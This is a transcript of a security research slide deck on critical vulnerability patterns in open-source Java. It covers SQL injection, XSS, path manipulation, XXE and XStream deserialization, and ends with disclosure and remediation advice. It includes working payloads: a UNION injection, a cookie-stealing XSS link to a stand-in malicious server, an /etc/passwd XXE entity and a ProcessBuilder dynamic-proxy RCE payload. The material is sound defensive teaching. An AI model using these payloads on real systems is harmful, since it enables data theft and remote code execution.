Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Critical vulnerability patterns in open-source Java

Alvaro
March 22, 2016

Critical vulnerability patterns in open-source Java

Alvaro

March 22, 2016
Tweet

More Decks by Alvaro

Other Decks in Research

Transcript

  1. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. Critical vulnerability patterns in open-source Java Alvaro Muñoz, Software Security Researcher
  2. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 2 Whois Alvaro Muñoz Employer Hewlett-Packard Organization HP Software Security Research Responsibilities Research the security impact of new technologies. Specially interested on Web stuff, any language, any framework. In previous episodes Application Security Consultant Pentester Other Stuff CTF player, OSCP, GWAPT, CISSP … Location Madrid, Spain @pwntester
  3. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 3 Critical vulnerability patterns in open-source Java Agenda 1.  Why should I care in the first place? 2.  OSS Security Posture 3.  Critical issues in OSS applications 4.  Critical issues in OSS components 5.  Disclosure in the open source world 6.  Five steps to open source peace of mind
  4. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. Why should I care in the first place?
  5. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 5 Some metrics “By 2015 ninety-nine percent of mission critical applications in Global 2000 companies will contain open source.” “80% of the code in today’s applications comes from libraries and frameworks” “More than half of Global 500 companies are using open source applications with known vulnerabilities” “26% of library downloads have known vulnerabilities” Gartner & SonaType & Aspect Security Source: https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf
  6. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 6 Using Components with Known Vulnerabilities New OWASP Top10 2013 – A9 Source: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/OWASP-Top-Ten-2013/ba-p/6046369
  7. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. OSS Security Posture
  8. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 8 The research Goal: •  Figure out the security posture of Open Source Software Procedure: •  Analyze 10 popular Java open source applications with Fortify SCA •  Use the same Fortify SCA version and rulepacks for all tests •  Scan the latest released snapshot as well as a three years old version •  Focus on the critical issues only •  Manually review a popular open source library
  9. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 9 The applications •  Messaging and Integration Patterns server Apache ActiveMQ •  Portlet container Liferay Portal •  Implementation of the Java Servlet and JSP technologies Apache Tomcat •  Application server that implements the Java EE JBoss •  Continuous integration Server Cruise Control •  Full-featured, multi-user and group-blog server Apache Roller •  Enterprise resource planning (ERP) system Ofbiz •  Website content management system OpenCMS •  A light weight, open source, blogger Pebble •  Microfinance institution management system Mifos
  10. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 10 Persistent XSS Reflected XSS Insecure Password submission SQL injection Path Manipulation Privacy Violation XML External Entity Inj Command Injection ActiveMQ ✔ ✔ ✔ ✔ ✔ Apache Roller ✔ ✔ Apache Tomcat ✔ ✔ ✔ ✔ Cruise Control ✔ ✔ ✔ JBoss ✔ ✔ Liferay Portal ✔ ✔ ✔ ✔ OfBiz ✔ ✔ ✔ ✔ OpenCMS ✔ ✔ ✔ Pebble ✔ ✔ Mifos ✔ ✔ SCA Findings
  11. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 11 # Critical findings 0 20 40 60 80 100 120 3 years Current
  12. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 12 # Critical findings Density 0 1 2 3 4 5 6 7 3 years Current
  13. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. Critical issues in OSS Applications
  14. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 14 Example 1: SQL Injection 1.  String uid = request.getParameter(“id”); 2.  String query = “select name from Users where id = “ + uid; 3.  dbconn.executeQuery(query); http://<host>/page.jsp?id=1 SELECT name FROM Users WHERE id = 1
  15. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 15 Example 1: SQL Injection 1.  String uid = request.getParameter(“id”); 2.  String query = “select name from Users where id = “ + uid; 3.  dbconn.executeQuery(query); http://<host>/page.jsp?id=1 union select ccid from Cards SELECT name FROM Users WHERE id = 1 UNION SELECT ccid FROM Cards
  16. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 16 Dataflow diagram Example 1 : SQL injection
  17. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 17 1.  @GET 2.  @Consumes({ MediaType.APPLICATION_JSON }) 3.  @Produces({ MediaType.APPLICATION_JSON }) 4.  public String retrieveStaff(UriInfo uriInfo,@QueryParam("sqlSearch") String sqlSearch, @QueryParam("officeId") Long officeId) { 5.  context.authenticatedUser().validateHasReadPermission(resourceNameForPermissions); 6.  final Collection<StaffData> staff = this.readPlatformService.retrieveAllStaff(sqlSearch, officeId); 7.  final ApiRequestJsonSerializationSettings settings = apiRequestParameterHelper.process(uriInfo.getQueryParameters()); 8.  return this.toApiJsonSerializer.serialize(settings, staff, RESPONSE_DATA_PARAMETERS); 9.  }
  18. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 18 1.  @GET 2.  @Consumes({ MediaType.APPLICATION_JSON }) 3.  @Produces({ MediaType.APPLICATION_JSON }) 4.  public String retrieveStaff(UriInfo uriInfo,@QueryParam("sqlSearch") String sqlSearch, @QueryParam("officeId") Long officeId) { 5.  context.authenticatedUser().validateHasReadPermission(resourceNameForPermissions); 6.  final Collection<StaffData> staff = this.readPlatformService.retrieveAllStaff(sqlSearch, officeId); 7.  final ApiRequestJsonSerializationSettings settings = apiRequestParameterHelper.process(uriInfo.getQueryParameters()); 8.  return this.toApiJsonSerializer.serialize(settings, staff, RESPONSE_DATA_PARAMETERS); 9.  }
  19. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 19 1.  @Override 2.  public Collection<StaffData> retrieveAllStaff(final String sqlSearch, final Long officeId) { 3.  final String extraCriteria = getStaffCriteria(sqlSearch, officeId); 4.  return retrieveAllStaff(extraCriteria); 5.  }
  20. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 20 1.  @Override 2.  public Collection<StaffData> retrieveAllStaff(final String sqlSearch, final Long officeId) { 3.  final String extraCriteria = getStaffCriteria(sqlSearch, officeId); 4.  return retrieveAllStaff(extraCriteria); 5.  }
  21. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 21 1.  private String getStaffCriteria(final String sqlSearch, final Long officeId) { 2.  String extraCriteria = "”; 3.  if (sqlSearch != null) { 4.  extraCriteria = " and (" + sqlSearch + ")"; 5.  } 6.  if (officeId != null) { 7.  extraCriteria += " and office_id = " + officeId; 8.  } 9.  if (StringUtils.isNotBlank(extraCriteria)) { 10.  extraCriteria = extraCriteria.substring(4); 11.  } 12.  return extraCriteria; 13.  }
  22. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 22 1.  private String getStaffCriteria(final String sqlSearch, final Long officeId) { 2.  String extraCriteria = "”; 3.  if (sqlSearch != null) { 4.  extraCriteria = " and (" + sqlSearch + ")"; 5.  } 6.  if (officeId != null) { 7.  extraCriteria += " and office_id = " + officeId; 8.  } 9.  if (StringUtils.isNotBlank(extraCriteria)) { 10.  extraCriteria = extraCriteria.substring(4); 11.  } 12.  return extraCriteria; 13.  }
  23. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 23 1.  private String getStaffCriteria(final String sqlSearch, final Long officeId) { 2.  String extraCriteria = "”; 3.  if (sqlSearch != null) { 4.  extraCriteria = " and (" + sqlSearch + ")"; 5.  } 6.  if (officeId != null) { 7.  extraCriteria += " and office_id = " + officeId; 8.  } 9.  if (StringUtils.isNotBlank(extraCriteria)) { 10.  extraCriteria = extraCriteria.substring(4); 11.  } 12.  return extraCriteria; 13.  }
  24. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 24 1.  @Override 2.  public Collection<StaffData> retrieveAllStaff(final String sqlSearch, final Long officeId) { 3.  final String extraCriteria = getStaffCriteria(sqlSearch, officeId); 4.  return retrieveAllStaff(extraCriteria); 5.  }
  25. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 25 1.  @Override 2.  public Collection<StaffData> retrieveAllStaff(final String sqlSearch, final Long officeId) { 3.  final String extraCriteria = getStaffCriteria(sqlSearch, officeId); 4.  return retrieveAllStaff(extraCriteria); 5.  }
  26. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 26 1.  private Collection<StaffData> retrieveAllStaff(final String extraCriteria) { 2.  final StaffMapper rm = new StaffMapper(); 3.  String sql = "select " + rm.schema(); 4.  if (StringUtils.isNotBlank(extraCriteria)) { 5.  sql += " where " + extraCriteria; 6.  } 7.  sql = sql + " order by s.lastname"; 8.  return this.jdbcTemplate.query(sql, rm, new Object[] {}); 9.  }
  27. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 27 1.  private Collection<StaffData> retrieveAllStaff(final String extraCriteria) { 2.  final StaffMapper rm = new StaffMapper(); 3.  String sql = "select " + rm.schema(); 4.  if (StringUtils.isNotBlank(extraCriteria)) { 5.  sql += " where " + extraCriteria; 6.  } 7.  sql = sql + " order by s.lastname"; 8.  return this.jdbcTemplate.query(sql, rm, new Object[] {}); 9.  }
  28. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 28 1.  private Collection<StaffData> retrieveAllStaff(final String extraCriteria) { 2.  final StaffMapper rm = new StaffMapper(); 3.  String sql = "select " + rm.schema(); 4.  if (StringUtils.isNotBlank(extraCriteria)) { 5.  sql += " where " + extraCriteria; 6.  } 7.  sql = sql + " order by s.lastname"; 8.  return this.jdbcTemplate.query(sql, rm, new Object[] {}); 9.  }
  29. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 29 1.  private Collection<StaffData> retrieveAllStaff(final String extraCriteria) { 2.  final StaffMapper rm = new StaffMapper(); 3.  String sql = "select " + rm.schema(); 4.  if (StringUtils.isNotBlank(extraCriteria)) { 5.  sql += " where " + extraCriteria; 6.  } 7.  sql = sql + " order by s.lastname"; 8.  return this.jdbcTemplate.query(sql, rm, new Object[] {}); 9.  }
  30. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 30 Example 2: Cross-Site Scripting
  31. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 31 Example 2: Cross Site Scripting http://<host>/page.jsp?user=John <html> <body> <h1>Hi John!</h1> </body> </html> Hi John!
  32. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 32 Hi! Example 2: Cross Site Scripting http://host/page.jsp?user=<script>alert(“xss”)</script> <html> <body> <h1>Hi <script>alert(“xss”)</script>!</h1> </body> </html> xss
  33. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 33 Will you click on this link?? www.mybank.com/transfers?user=<script>window.open(“http:// maliciousserver.com/cookiestealer.php?” + document.cookie());</script>
  34. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 34 What about this one? http://bit.ly/XSpPhP
  35. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 35 Hi<script>alert(“xss”)</script>! Example 2: Cross Site Scripting http://host/page.jsp?user=<script>alert(“xss”)</script> <html> <body> <h1>Hi &lt;script&gt;alert(“xss”)&lt;/script&gt;! </h1> </body> </html>
  36. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 36 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("<input type=\"hidden\" name=\""); 10.  result.append(param); 11.  result.append("\" value=\""); 12.  result.append(Encoder.escapeXml((String)entry.getValue())); 13.  result.append("\">\n"); 14.  } 15.  } 16.  return result.toString(); 17.  }
  37. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 37 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("<input type=\"hidden\" name=\""); 10.  result.append(param); 11.  result.append("\" value=\""); 12.  result.append(Encoder.escapeXml((String)entry.getValue())); 13.  result.append("\">\n"); 14.  } 15.  } 16.  return result.toString(); 17.  } Safe output encoding
  38. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 38 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("<input type=\"hidden\" name=\""); 10.  result.append(param); 11.  result.append("\" value=\""); 12.  result.append(Encoder.escapeXml((String)entry.getValue())); 13.  result.append("\">\n"); 14.  } 15.  } 16.  return result.toString(); 17.  }
  39. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 39 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("<input type=\"hidden\" name=\""); 10.  result.append(param); 11.  result.append("\" value=\""); 12.  result.append(Encoder.escapeXml((String)entry.getValue())); 13.  result.append("\">\n"); 14.  } 15.  } 16.  return result.toString(); 17.  }
  40. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 40 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("<input type=\"hidden\" name=\""); 10.  result.append(param); 11.  result.append("\" value=\""); 12.  result.append(Encoder.escapeXml((String)entry.getValue())); 13.  result.append("\">\n"); 14.  } 15.  } 16.  return result.toString(); 17.  }
  41. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 41 1.  public String paramsAsHidden(Collection excludes) { 2.  StringBuffer result = new StringBuffer(512); 3.  Map params = new HashMap(getJsp().getRequest().getParameterMap()); 4.  Iterator i = params.entrySet().iterator(); 5.  while (i.hasNext()) { 6.  Map.Entry entry = (Map.Entry)i.next(); 7.  String param = (String)entry.getKey(); 8.  if ((excludes == null) || (!excludes.contains(param))) { 9.  result.append("<input type=\"hidden\" name=\""); 10.  result.append(param); 11.  result.append("\" value=\""); 12.  result.append(Encoder.escapeXml((String)entry.getValue())); 13.  result.append("\">\n"); 14.  } 15.  } 16.  return result.toString(); 17.  }
  42. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 42 Example 3: Path Manipulation
  43. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 43 1.  public View process(HttpServletRequest request, HttpServletResponse response) throws ServletException { 2.  Blog blog = (Blog)getModel().get(Constants.BLOG_KEY); 3.  String name = request.getParameter("name"); 4.  String type = request.getParameter("type"); 5.  String path = request.getParameter("path"); 6.  String content = request.getParameter("fileContent"); 7.  try { 8.  FileManager fileManager = new FileManager(blog, type); 9.  fileManager.saveFile(path, name, content); 10.  if (type.equals(FileMetaData.THEME_FILE)) { 11.  fileManager = new FileManager(blog, FileMetaData.BLOG_DATA); 12.  fileManager.saveFile("/theme" + path, name, content); 13.  } 14.  blog.info("File \"" + StringUtils.transformHTML(name) + "\" saved."); 15.  } catch (IllegalFileAccessException e) { 16.  return new ForbiddenView(); 17.  } catch (IOException ioe) { 18.  throw new ServletException(ioe); 19.  } 20.  return new ForwardView("/editFile.secureaction"); 21.  }
  44. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 44 1.  public void saveFile(String path, String name, String content) throws IOException, IllegalFileAccessException { 2.  FileMetaData subDirectory = getFileMetaData(path); 3.  File fileToSave = new File(getFile(subDirectory), name); 4.  if (!isUnderneathRootDirectory(fileToSave)) { 5.  throw new IllegalFileAccessException(); 6.  } 7.  BufferedWriter writer = null; 8.  try { 9.  writer = new BufferedWriter(new FileWriter(fileToSave)); 10.  writer.write(content); 11.  writer.flush(); 12.  } finally { 13.  IOUtils.closeQuietly(writer); 14.  } 15.  }
  45. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. Critical issues in OSS Components
  46. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 46 A closer look at Spring In their own words:
  47. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 47 Security issues reported: Timeline Date CVE # Description 09 October 2012 CVE-2012-5055 Spring Security's DaoAuthenticationProvider can reveal if a username is valid 29 March 2012 CVE-2012-1833 Grails data binding vulnerability 9 September 2011 CVE-2011-2894 Spring Framework and Spring Security serialization-based remoting vulnerabilities 9 September 2011 CVE-2011-2732 Spring Security header injection vulnerability 9 September 2011 CVE-2011-2731 Spring Security Privilege escalation when using RunAsManager 9 September 2011 CVE-2011-2730 Spring Framework Information Disclosure and remote code execution 10 August 2011 CVE-2011-0527 vFabric tc Server password obfuscation bypass 24 May 2011 CVE-2011-1942 Spring Web Services: Information Disclosure 5 February 2011 CVE-2009-2899 Hyperic HQ: Information disclosure 27 October 2010 CVE-2010-3700 Spring Security: Bypass of security constraints 17 June 2010 CVE-2010-1622 Spring Framework: Execution of arbitrary code 13 May 2010 CVE-2010-1454 tc Server Runtime: Unauthenticated access to remote JMX interface 23 March 2010 CVE-2009-2907 Hyperic HQ: Multiple XSS 2 October 2009 CVE-2009-2898 Hyperic HQ: Stored XSS 2 October 2009 CVE-2009-2897 Hyperic HQ: Reflected XSS 22 April 2009 CVE-2009-1190 Spring Framework: Remote denial of service
  48. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 48 RESTFul APIs •  RESTFul APIs are becoming more popular •  They can be found everywhere, especially for powering up mobile applications •  The most popular frameworks for Java are JAX-RS and SpringMVC •  SpringMVC uses SpringOXM to un-marshall the incoming XML messages into Java Objects <contact> <name>John</name> <lastname>Smith</lastname> <description>Friend</description> </contact> public void createContact(Contact c) { save(c); log(c.getDescription()); }
  49. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 49 XML Entities XML External Entity Injection (XXE) <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE contracts [<!ENTITY terms “<Terms and Conditions>”>]> <contracts> <contract> <header>…</header> <body>…</body> <terms>&terms;</terms> </contract> … </contracts>
  50. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 50 XML Entities XML External Entity Injection (XXE) <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE contracts [<!ENTITY terms SYSTEM “http://server/terms”>]> <contracts> <contract> <header>…</header> <body>…</body> <terms>&terms;</terms> </contract> … </contracts>
  51. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 51 Anatomy of an XXE Attack public void createContact(Contact c) { save(c); } public Contact getContact(Long id) { Contact c = getContact(id); return c; } RESTFul WebService
  52. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 52 Anatomy of an XXE Attack <contact> <name>John</name> <lastname>Smith</lastname> <description>Friend</description> </contact> public void createContact(Contact c) { save(c); } RESTFul WebService public Contact getContact(Long id) { Contact c = getContact(id); return c; }
  53. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 53 Anatomy of an XXE Attack public void createContact(Contact c) { save(c); } Name: John! Last name: Smith! Description:! Friend! RESTFul WebService public Contact getContact(Long id) { Contact c = getContact(id); return c; } <contact> <name>John</name> <lastname>Smith</lastname> <description>Friend</description> </contact>
  54. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 54 Anatomy of an XXE Attack <contact> <name>John</name> <lastname>Smith</lastname> <description>&xxe;</description> </contact> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE contact[ <!ENTITY xxe SYSTEM "file://etc/passwd">]> public Contact getContact(Long id) { Contact c = getContact(id); return c; } public void createContact(Contact c) { save(c); }
  55. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 55 <contact> <name>John</name> <lastname>Smith</lastname> <description>&xxe;</description> </contact> Anatomy of an XXE Attack Name: John! Last name: Smith! Description:! root:*:0:0:System:/var/root:/bin/sh! user1:*:0:0:System:/var/root:/bin/sh! user2:*:0:0:System:/var/root:/bin/sh! user3:*:0:0:System:/var/root:/bin/sh! ! public void createContact(Contact c) { save(c); } public Contact getContact(Long id) { Contact c = getContact(id); return c; } <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE contact[ <!ENTITY xxe SYSTEM "file://etc/passwd">]>
  56. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 56 SpringOXM unmarshallers SpringOXM is a wrapper around a a variety of unmarshalers including: •  JAXB •  Castor •  XStream Our research concludes that: •  Xstream Wrapper is not vulnerable since it does not process DOCTYPE blocks •  Castor Wrapper is insecure but there is an undocumented way to secure it •  JAXB Wrapper is insecure and there is no way to secure it Unfortunately JAXB is by far the most popular
  57. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 57
  58. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 58 •  XStream is not exactly a marshaller as it allows full object serialization •  http://xstream.codehaus.org/converters.html contains a complete list of objects that can be serialized •  One interesting class: DynamicProxyConverter Remote Code Execution in XStream unmarshaller
  59. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 59 What is a DynamicProxy again? A way to intercept method calls on an interface and inject custom code Class filed1 field2 method1 method2 method3
  60. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 60 What is a DynamicProxy again? A way to intercept method calls on an interface and inject custom code Interface method1 method2 Implementation filed1 field2 method1 method2 method3
  61. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 61 What is a DynamicProxy again? A way to intercept method calls on an interface and inject custom code Interface method1 method2 Object filed1 field2 method1 method2 method3 Proxy method2 Custom code
  62. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 62 Turning a Feature into a Bug Attacker’s plan: •  Find out what Class the XML will be deserialized to •  Create a proxy for that Class the WebService is waiting for •  Intercept/hook any call to any method in the interface •  Replace the original call with the malicious payload •  Send the serialized version of the proxy •  Cross-fingers •  Profit
  63. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 63
  64. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 64 Exploit <contact> <id>1</id> <firstName>alvaro</firstName> <lastName>munoz</lastName> <email>alvaro.munoz@hp.com</email> </contact>
  65. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 65 Exploit <dynamic-proxy> <interface>org.company.model.Contact</interface> <handler class="java.beans.EventHandler"> <target class="java.lang.ProcessBuilder"> <command><string>calc.exe</string></command> </target> <action>start</action> </handler> </dynamic-proxy> <contact> <id>1</id> <firstName>alvaro</firstName> <lastName>munoz</lastName> <email>alvaro.munoz@hp.com</email> </contact>
  66. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 66 Meanwhile in the application code … 1.  @Controller 2.  @RequestMapping("/contacts") 3.  public class ContactController { 4.  @Autowired 5.  private ContactRepository contactRepository; 6.  @RequestMapping( method = RequestMethod.POST ) 7.  @ResponseStatus( HttpStatus.CREATED ) 8.  public final String create( @RequestBody Contact contact ){ 9.  log(”Creating new contact: " + contact.getFirstName()); 10.  contactRepository.save(contact); 11.  return "OK"; 12.  } 13.  }
  67. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 67 1.  @Controller 2.  @RequestMapping("/contacts") 3.  public class ContactController { 4.  @Autowired 5.  private ContactRepository contactRepository; 6.  @RequestMapping( method = RequestMethod.POST ) 7.  @ResponseStatus( HttpStatus.CREATED ) 8.  public final String create( @RequestBody Contact contact ){ 9.  log(”Creating new contact: " + contact.getFirstName()); 10.  contactRepository.save(contact); 11.  return "OK"; 12.  } 13.  } Meanwhile in the application code …
  68. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 68
  69. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. Disclosure in the Open Source World
  70. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 70 Responsible Disclosure •  Open Source projects have been notified about the issues found during this research •  Reactions cover the whole spectrum: from immediate response to no response at all Special thanks to the developers and maintainers of the SpringSource project for their prompt responses
  71. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 71 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository
  72. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 72 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository
  73. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 73 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository
  74. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 74 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository
  75. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 75 https://github.com/EllisLab/CodeIgniter/pull/1888#issuecomment-9427869 CodeIgniter Github Repository The conversation goes on … Conclusion, 9 months after the issue is still open!
  76. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 76
  77. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 77 OSS developers Vs. Security Researchers Gap Developers vs. security auditors is an ongoing battle •  OSS is not an exception •  In mature OSS projects there is a Security team to smooth it down Security researchers cannot just break in and try to change how things are done •  Developers need remediation guidance Security issues are normally reported in a non actionable way •  Developers need to understand issues if you want them to change their code Avoid using security buzzy talk e.g.: Cross-site scripting vs Lack of output encoding
  78. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 78 Rewarding Researchers for Responsibly Disclosing Vulnerabilities Zero Day Initiative (ZDI) World’s Leading Vulnerability Bounty Program •  Network of Almost 3,000 Researchers Worldwide •  $8 Million Paid to Researchers •  Disclosed Over 1300 Vulnerabilities Patching of Critical Defects in Software •  36% of Oracle Java’s Critical Vulnerabilities with CVSS > 9.0 •  ~50% of Microsoft Critical Vulnerabilities in 2013 Proven Thought Leadership •  Pwn2Own Hacking Competition Series •  Frost & Sullivan Market Share Leader 2012 •  Leader in Critical Vulnerability Disclosures in 2013
  79. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. Five steps to open source peace of mind
  80. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

    herein is subject to change without notice. 80 Step 1: Identify your open source usage 1.1 Identify Open Source Software used throughout your company and versions –  Libraries –  Frameworks –  Middleware –  Applications 100% open source (CMS, Blogs, Application servers …) 1.2 Create and validate against a release policy –  Automate this process when possible 1.3 Use data collected to build profiles on each project –  Open source code’s origin –  Where to get updates (including security alerts) –  How often the community releases new versions
  81. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained

